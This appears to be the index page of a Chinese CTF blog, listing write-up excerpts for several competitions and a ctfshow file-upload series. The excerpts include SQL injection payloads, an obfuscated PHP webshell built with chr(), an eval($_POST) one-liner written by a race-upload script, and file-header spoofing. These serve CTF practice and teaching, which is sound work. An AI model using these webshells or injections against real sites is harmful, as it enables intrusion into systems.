常用资源汇总 常用资源汇总由于本人脑子不好使,经常忘一些东西,故写篇文章汇总一些资源以便随时使用。 命令类GitfastbootADB 工具类Arjun sqlmap fenjing flask-session-cookie-manager fastcoll 2025-11-01 汇总
PolarisCTF only real非预期直接看/flag.php就行 revengejwt爆破密钥伪造admin之后就可以上传图片,后端对文件类型没有校验,直接抓包修改文件后缀名,文件内容有WAF,我们使用ascii🐎 12345678<?=$func=chr(115).chr(121).chr(115).chr(116).chr(101).chr(109);$cmd=''; 2026-03-29
SDPCSEC纳新赛3.0 webreal_signin提示有备份,直接扫一下目录,果然发现了index.php.bak 12345678910111213141516171819<?php$SECRET_KEY='xxxxxxxxxxxx'; # len($SECRET_KEY) = 12function hashEncode($data) { global $SECRET_KEY 2026-03-28
数字中国暨第六届“红明谷”初赛 被ai杀爆了 gopherblog1GET /api/posts/search?q=' OR 1=1 -- 返回了所有文章,存在SQL注入漏洞 1' UNION SELECT 1,name,sql,2,3',4 FROM sqlite_master WHERE type='table' -- 查表,有users,settings,posts 2026-03-26
ctfshow 文件上传web161-163文件头伪造1GIF89a 竞争上传123<?php$f=fopen("7.php","w");fputs($f,'<?php eval($_POST[7]);?>');?> web164上传一个正常的图片,发现查看图片的时候存在文件包含漏洞,打一个图片马 12345678910111 2026-03-24
Pyjail沙箱逃逸 引子[SHCTF_3rd]Eazy_Pyrunner通过任意文件读取漏洞我们可以读到源代码 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677787980818 2026-03-23
SHCTF第三届山河杯 [阶段1] Ezphp这里还是知识欠缺了,最后读文件用的是php的原生类:( 基本的链子会写,关键就是最后一步原生类的利用 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768<?phphig 2026-03-21
PolarCTF2026春季赛 平台和💩一样 新年贺卡当action=admin的时候可以添加模版,并且保存的格式是php 所以我们上传一个shell.php,内容是一句话木马 猜测TEMPLATE_DIR 是templates,访问http://xxx/templates/shell.php 预期解应该是传一个php 1echo `cat /f*` 然后生成并下载贺卡,在生成的时候就会加载模版文件 并发上传题目名 2026-03-20
DSBCTF单身杯 好玩的PHP123456789101112131415161718192021222324252627282930<?php error_reporting(0); highlight_file(__FILE__); class ctfshow { private $d = ''; private $s = 2026-03-19
XGCTF西瓜杯 CodeInject12345678<?php#Author: h1xaerror_reporting(0);show_source(__FILE__);eval("var_dump((Object)$_POST[1]);"); 尝试闭合注入 tpdoor第一次做ThinkPHP,先用ai分析一下源码 123456789101112131415161718192021 2026-03-15 CTF